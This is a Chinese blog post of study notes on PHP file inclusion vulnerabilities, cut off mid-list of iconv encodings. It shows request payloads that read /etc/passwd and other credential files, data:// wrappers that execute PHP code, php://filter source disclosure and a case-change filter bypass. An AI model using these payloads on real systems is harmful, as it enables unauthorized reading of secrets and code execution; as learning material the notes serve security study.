<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/32x32.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/16x16.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="文件包含认识是文件包含：通过PHP函数引入文件时，传入的文件名没有经过合理的验证，从而操作了预想之外的文件，就可能导致意外的文件泄漏甚至恶意代码注入。 文件包含的环境要求： allow_url_fopen&#x3D;On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include&#x3D;On(php5.2之后默认为Off) 规定是否允许include&#x2F;require远程文">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含学习记录">
<meta property="og:url" content="http://example.com/2024/03/09/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/index.html">
<meta property="og:site_name" content="Ed3n&#39;s Blog">
<meta property="og:description" content="文件包含认识是文件包含：通过PHP函数引入文件时，传入的文件名没有经过合理的验证，从而操作了预想之外的文件，就可能导致意外的文件泄漏甚至恶意代码注入。 文件包含的环境要求： allow_url_fopen&#x3D;On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include&#x3D;On(php5.2之后默认为Off) 规定是否允许include&#x2F;require远程文">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2023/11/18/K4ZT6yleCf2sxOg.png">
<meta property="article:published_time" content="2024-03-08T16:00:00.000Z">
<meta property="article:modified_time" content="2024-03-09T08:11:06.183Z">
<meta property="article:author" content="Ed3n">
<meta property="article:tag" content="文件包含">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2023/11/18/K4ZT6yleCf2sxOg.png">

<link rel="canonical" href="http://example.com/2024/03/09/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>文件包含学习记录 | Ed3n's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ed3n's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/03/09/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Ed3n">
      <meta itemprop="description" content="欢迎光临，我的朋友">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ed3n's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          文件包含学习记录
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2024-03-09 00:00:00 / 修改时间：16:11:06" itemprop="dateCreated datePublished" datetime="2024-03-09T00:00:00+08:00">2024-03-09</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" itemprop="url" rel="index"><span itemprop="name">文件包含</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h1><h2 id="认识是文件包含："><a href="#认识是文件包含：" class="headerlink" title="认识是文件包含："></a>认识是文件包含：</h2><p>通过<code>PHP</code>函数引入文件时，传入的文件名没有经过合理的验证，从而操作了预想之外的文件，就可能导致意外的文件泄漏甚至恶意代码注入。</p>
<h3 id="文件包含的环境要求："><a href="#文件包含的环境要求：" class="headerlink" title="文件包含的环境要求："></a>文件包含的环境要求：</h3><ul>
<li><code>allow_url_fopen=On</code>(默认为<code>On</code>) 规定是否允许从远程服务器或者网站检索数据</li>
<li><code>allow_url_include=On</code>(<code>php5.2</code>之后默认为<code>Off</code>) 规定是否允许include&#x2F;require远程文件</li>
</ul>
<h3 id="常见文件包含函数："><a href="#常见文件包含函数：" class="headerlink" title="常见文件包含函数："></a>常见文件包含函数：</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>() <span class="comment">//执行到include时才包含文件，找不到文件只生成警告（E_WARNING），并且脚本会继续 </span></span><br><span class="line"><span class="keyword">require</span>() <span class="comment">//程序运行就包含文件，找不到文件会生成致命错误（E_COMPILE_ERROR）并停止脚本 </span></span><br><span class="line"><span class="keyword">include_once</span>() </span><br><span class="line"><span class="keyword">require_once</span>() </span><br><span class="line"><span class="comment">//和前面注解一样，_once()后缀表明只会包含一次，已包含则不会再包含</span></span><br></pre></td></tr></table></figure>

<h3 id="文件包含特性："><a href="#文件包含特性：" class="headerlink" title="文件包含特性："></a>文件包含特性：</h3><p>只要被包含的文件的文件内容符合PHP语法，不管文件类型是什么，该文件都会被PHP解释器去解析执行；如果文件内容不符合PHP语法，就会将该文件内容读取出来。</p>
<h2 id="文件包含利用"><a href="#文件包含利用" class="headerlink" title="文件包含利用"></a>文件包含利用</h2><h3 id="读取敏感文件"><a href="#读取敏感文件" class="headerlink" title="读取敏感文件"></a>读取敏感文件</h3><p>直接读取</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//example.com/file.php?file=f&#x27;l.txt</span></span><br></pre></td></tr></table></figure>

<p>file协议读取</p>
<p>本地文件传输协议，用于访问本地计算机中的文件。好比通过Windows的资源管理器中打开文件或者通过右键单击<code>打开</code>一样。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//example.com/file.php?file=file:///etc/passwd</span></span><br></pre></td></tr></table></figure>

<p>注意：向<code>include()</code>函数传递参数的名字不一定为<code>file</code></p>
<h4 id="常见敏感文件"><a href="#常见敏感文件" class="headerlink" title="常见敏感文件"></a>常见敏感文件</h4><h5 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h5><table>
<thead>
<tr>
<th align="center">文件</th>
<th align="center">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="center">C:\boot.ini</td>
<td align="center">查看系统版本</td>
</tr>
<tr>
<td align="center">C:\windows\system32\inetsrv\MetaBase.xml</td>
<td align="center">iis配置文件</td>
</tr>
<tr>
<td align="center">C:\windows\repair\same</td>
<td align="center">存储windows系统初次安装密码</td>
</tr>
<tr>
<td align="center">C:\ProgramFiles\mysql\my.ini</td>
<td align="center">mysql配置信息</td>
</tr>
<tr>
<td align="center">C:\ProgramFiles\mysql\data\mysql\user.MYD</td>
<td align="center">mysql root密码</td>
</tr>
<tr>
<td align="center">C:\windows\win.ini</td>
<td align="center">系统信息，常用于注入木马</td>
</tr>
</tbody></table>
<h5 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h5><table>
<thead>
<tr>
<th align="center">文件</th>
<th align="center">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="center">&#x2F;etc&#x2F;passwd</td>
<td align="center">账户信息</td>
</tr>
<tr>
<td align="center">&#x2F;etc&#x2F;shadow</td>
<td align="center">账户密码文件</td>
</tr>
<tr>
<td align="center">&#x2F;etc&#x2F;apache2&#x2F;apache2.conf</td>
<td align="center">Apache2默认配置文件</td>
</tr>
<tr>
<td align="center">&#x2F;etc&#x2F;my.conf</td>
<td align="center">mysql配置文件</td>
</tr>
<tr>
<td align="center">&#x2F;etc&#x2F;php&#x2F;5.6&#x2F;apache2&#x2F;php.ini</td>
<td align="center">mysql配置文件</td>
</tr>
<tr>
<td align="center">&#x2F;etc&#x2F;httpd&#x2F;conf&#x2F;httpd.conf</td>
<td align="center">apache配置信息</td>
</tr>
</tbody></table>
<h3 id="数据流封装器"><a href="#数据流封装器" class="headerlink" title="数据流封装器"></a>数据流封装器</h3><p>data协议用于传输数据，经常配合<code>file_get_contents()</code>函数使用。</p>
<p>data协议用于传输数据，经常配合<code>file_get_contents()</code>函数使用。 </p>
<p>使用条件： </p>
<p>php版本大于等于5.2.0 </p>
<p>php.ini中<code>allow_url_fopen=On</code>，<code>all_url_include=On</code></p>
<p>用法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">data:<span class="comment">//,＜文本数据＞</span></span><br><span class="line">data:<span class="comment">//text/plain,＜文本数据＞</span></span><br><span class="line">data:<span class="comment">//text/html,＜HTML代码＞ </span></span><br><span class="line">data:<span class="comment">//text/html;base64,＜base64编码的HTML代码＞     </span></span><br><span class="line">data:<span class="comment">//text/css,＜CSS代码＞ </span></span><br><span class="line">data:<span class="comment">//text/css;base64,＜base64编码的CSS代码＞ </span></span><br><span class="line">data:<span class="comment">//text/javascript,＜Javascript代码＞ </span></span><br><span class="line">data:<span class="comment">//text/javascript;base64,＜base64编码的Javascript代码＞ </span></span><br><span class="line">data:<span class="comment">//image/gif;base64,base64编码的gif图片数据 </span></span><br><span class="line">data:<span class="comment">//image/png;base64,base64编码的png图片数据 </span></span><br><span class="line">data:<span class="comment">//image/jpeg;base64,base64编码的jpeg图片数据 </span></span><br><span class="line">data:<span class="comment">//image/x-icon;base64,base64编码的icon图片数据</span></span><br></pre></td></tr></table></figure>

<p>实例</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">?file=data:<span class="comment">//text/plain,&lt;?php phpinfo();?&gt;</span></span><br><span class="line">?file=data:<span class="comment">//text/plain,%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e</span></span><br><span class="line"><span class="comment"># url编码</span></span><br><span class="line">?file=data:<span class="comment">//text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+</span></span><br><span class="line"><span class="comment"># &lt;?php phpinfo();?&gt;</span></span><br><span class="line">?file=data:<span class="comment">//text/plain;base64,PD9waHAgcGhwaW5mbygpOw==</span></span><br><span class="line"><span class="comment"># &lt;?php phpinfo();</span></span><br></pre></td></tr></table></figure>

<p><code>&lt;?php phpinfo();?&gt;</code>编成base64的时候出现了<code>+</code>。而浏览器不认识<code>+</code>，所以一般不加<code>?&gt;</code></p>
<h3 id="读取源代码"><a href="#读取源代码" class="headerlink" title="读取源代码"></a>读取源代码</h3><h4 id="目的"><a href="#目的" class="headerlink" title="目的"></a>目的</h4><p>在进行 php 代码审计时，需要查看目标的源代码。但是利用文件包含漏洞直接包含 php 文件时会被解析，不能看到源码，这时可以用 <code>php://filter</code> 来读取源代码文件。</p>
<h4 id="基本使用"><a href="#基本使用" class="headerlink" title="基本使用"></a>基本使用</h4><h5 id="直接读写"><a href="#直接读写" class="headerlink" title="直接读写"></a>直接读写</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//filter/resource=filepath</span></span><br></pre></td></tr></table></figure>

<h5 id="过滤器的基本使用"><a href="#过滤器的基本使用" class="headerlink" title="过滤器的基本使用"></a>过滤器的基本使用</h5><h6 id="base64-的编码与解码"><a href="#base64-的编码与解码" class="headerlink" title="base64 的编码与解码"></a>base64 的编码与解码</h6><p><code>convert.base64-encode</code> 与 <code>convert.base64-decode</code> 是 <code>php://filter</code> 所支持的过滤器，使用这两个过滤器等同于使用 <code>base64_encode()</code> 与 <code>base64_decode()</code> 对数据流进行处理。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//filter/convert.base64-encode/resource=filepath</span></span><br><span class="line">php:<span class="comment">//filter/convert.base64-decode/resource=filepath</span></span><br></pre></td></tr></table></figure>

<p>实例</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    </span><br><span class="line"><span class="comment"># 省略 write=</span></span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">&#x27;php://filter/convert.base64-encode/resource=./file.txt&#x27;</span>, <span class="string">&#x27;Hello World&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取 base64 编码后的内容</span></span><br><span class="line"><span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://filter/resource=./file.txt&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$content</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># 通过 convert.base64-decode 过滤器数据流进行 base64 解码操作</span></span><br><span class="line"><span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://filter/read=convert.base64-decode/resource=./file.txt&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$content</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">string</span>(<span class="number">16</span>) <span class="string">&quot;SGVsbG8gV29ybGQ=&quot;</span></span><br><span class="line"><span class="keyword">string</span>(<span class="number">11</span>) <span class="string">&quot;Hello World&quot;</span></span><br><span class="line">PHP Warning:  <span class="title function_ invoke__">file_get_contents</span>(): Unable to locate filter <span class="string">&quot;resource=.&quot;</span> in C:\demo.php on line <span class="number">8</span></span><br><span class="line">PHP Warning:  <span class="title function_ invoke__">file_get_contents</span>(): Unable to create <span class="title function_ invoke__">filter</span> (resource=.) in C:\demo.php on line <span class="number">8</span></span><br><span class="line">PHP Warning:  <span class="title function_ invoke__">file_get_contents</span>(): Unable to locate filter <span class="string">&quot;file.txt&quot;</span> in C:\demo.php on line <span class="number">8</span></span><br><span class="line">PHP Warning:  <span class="title function_ invoke__">file_get_contents</span>(): Unable to create <span class="title function_ invoke__">filter</span> (file.txt) in C:\demo.php on line <span class="number">8</span></span><br></pre></td></tr></table></figure>

<h6 id="rot13-加密与解密"><a href="#rot13-加密与解密" class="headerlink" title="rot13 加密与解密"></a>rot13 加密与解密</h6><p>rot13算法</p>
<p>ROT13（Rotate By 13 Places）是一种简单的字母替代密码，是凯撒密码的一种变体。其基本思想是将字母表中的每一个字母移动 <code>13</code> 个位置。因为拉丁字母表有 <code>26</code> 个字母，所以 <code>ROT13 解密</code> 是其自身的 <code>逆运算</code>：即对一个已经 ROT13 加密的文本再次进行 ROT13 加密，将获得加密文本的原始文本。</p>
<p><img src="https://s2.loli.net/2023/11/18/K4ZT6yleCf2sxOg.png" alt="image-20231026093556600"></p>
<p>这种加密方法的主要优点是它的简单性和对称性，但显然，<code>ROT13</code> 不提供真正的安全性，因为它很容易破解。事实上，ROT13 经常在在线社区中用作一种简单的方式来 <strong>隐藏剧透、答案或轻微的冒犯内容，而不是用作真正的加密手段</strong>。</p>
<p>string.rot13</p>
<p>通过 <code>php://filter</code> 使用 <code>string.rot13</code> 过滤器即可对数据流进行 <code>rot13</code> 处理。对此，请参考如下示例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 对数据流进行 ROT13 加密</span></span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">&#x27;php://filter/write=string.rot13/resource=file.txt&#x27;</span>, <span class="string">&#x27;Hello World&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># 读取数据但不对数据流应用任何过滤器</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;php://filter/resource=./file.txt&#x27;</span>);</span><br><span class="line"><span class="keyword">print</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># 对数据流进行 ROT13 加密以获取其原文</span></span><br><span class="line"><span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://filter/read=string.rot13/resource=file.txt&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$content</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Uryyb Jbeyq</span><br><span class="line"><span class="keyword">string</span>(<span class="number">11</span>) <span class="string">&quot;Hello World&quot;</span></span><br><span class="line">PHP Warning:  <span class="keyword">include</span>(): Unable to locate filter <span class="string">&quot;resource=.&quot;</span> in C:\demo.php on line <span class="number">8</span></span><br><span class="line">PHP Warning:  <span class="keyword">include</span>(): Unable to create <span class="title function_ invoke__">filter</span> (resource=.) in C:\demo.php on line <span class="number">8</span></span><br><span class="line">PHP Warning:  <span class="keyword">include</span>(): Unable to locate filter <span class="string">&quot;file.txt&quot;</span> in C:\demo.php on line <span class="number">8</span></span><br><span class="line">PHP Warning:  <span class="keyword">include</span>(): Unable to create <span class="title function_ invoke__">filter</span> (file.txt) in C:\demo.php on line <span class="number">8</span></span><br></pre></td></tr></table></figure>

<h5 id="过滤器列表"><a href="#过滤器列表" class="headerlink" title="过滤器列表"></a>过滤器列表</h5><h6 id="多个过滤器的使用"><a href="#多个过滤器的使用" class="headerlink" title="多个过滤器的使用"></a>多个过滤器的使用</h6><p>在为 <code>php://filter</code> 指定过滤器时，可以通过 <code>管道符 |</code> 指定多个过滤器（过滤器列表），这些过滤器将按照 <strong>从左至右</strong>的顺序 <strong>依次</strong> 对数据流进行处理。对此，请参考如下示例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 依次对数据流进行 base64 编码处理，rot13 处理。</span></span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">&#x27;php://filter/convert.base64-encode|string.rot13/resource=file.txt&#x27;</span>, <span class="string">&#x27;Hello World&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># 对 file.txt 文件中的内容进行普通读取</span></span><br><span class="line"><span class="variable">$raw_content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;./file.txt&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$raw_content</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment"># 由于没有先将文件中的内容进行 rot13 处理，直接对其进行解码将无法恢复原数据内容。</span></span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$raw_content</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment"># 先对文件中的内容进行 rot13 处理，再对处理结果进行 base64 解码</span></span><br><span class="line"><span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://filter/string.rot13|convert.base64-decode/resource=./file.txt&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$content</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">string</span>(<span class="number">16</span>) <span class="string">&quot;FTIfoT8tI29loTD=&quot;</span></span><br><span class="line"><span class="keyword">string</span>(<span class="number">11</span>) <span class="string">&quot;2�?-#oe�0&quot;</span></span><br><span class="line"><span class="keyword">string</span>(<span class="number">11</span>) <span class="string">&quot;Hello World&quot;</span></span><br></pre></td></tr></table></figure>

<p>在使用 <code>管道符 |</code> 连接多个过滤器时，<strong>与管道符之间存在空格的过滤器均将失效</strong>。</p>
<h5 id="过滤器被ban"><a href="#过滤器被ban" class="headerlink" title="过滤器被ban"></a>过滤器被ban</h5><h6 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h6><p>比如</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=pHp:<span class="comment">//filter/convert.BAse64-encode/resource=/flag</span></span><br></pre></td></tr></table></figure>

<h6 id="convert-iconv转编码"><a href="#convert-iconv转编码" class="headerlink" title="convert.iconv转编码"></a><code>convert.iconv</code>转编码</h6><p>用法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//filter/convert.iconv.&lt;input-encoding&gt;.&lt;output-encoding&gt;/resource=filepath</span></span><br><span class="line">比如</span><br><span class="line">php:<span class="comment">//filter/convert.iconv.ASCII.UCS-2BE/resource=index.php</span></span><br><span class="line">php:<span class="comment">//filter/convert.iconv.utf-8.utf-7/resource=index.php</span></span><br></pre></td></tr></table></figure>

<p>php支持的编码格式：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line">UCS-<span class="number">4</span>*</span><br><span class="line">UCS-<span class="number">4</span>BE</span><br><span class="line">UCS-<span class="number">4</span>LE*</span><br><span class="line">UCS-<span class="number">2</span></span><br><span class="line">UCS-<span class="number">2</span>BE</span><br><span class="line">UCS-<span class="number">2</span>LE</span><br><span class="line">UTF-<span class="number">32</span>*</span><br><span class="line">UTF-<span class="number">32</span>BE*</span><br><span class="line">UTF-<span class="number">32</span>LE*</span><br><span class="line">UTF-<span class="number">16</span>*</span><br><span class="line">UTF-<span class="number">16</span>BE*</span><br><span class="line">UTF-<span class="number">16</span>LE*</span><br><span class="line">UTF-<span class="number">7</span></span><br><span class="line">UTF7-IMAP</span><br><span class="line">UTF-<span class="number">8</span>*</span><br><span class="line">ASCII*</span><br><span class="line">EUC-JP*</span><br><span class="line">SJIS*</span><br><span class="line">eucJP-win*</span><br><span class="line">SJIS-win*</span><br><span class="line">ISO-<span class="number">2022</span>-JP</span><br><span class="line">ISO-<span class="number">2022</span>-JP-MS</span><br><span class="line">CP932</span><br><span class="line">CP51932</span><br><span class="line">SJIS-mac</span><br><span class="line">MacJapanese</span><br><span 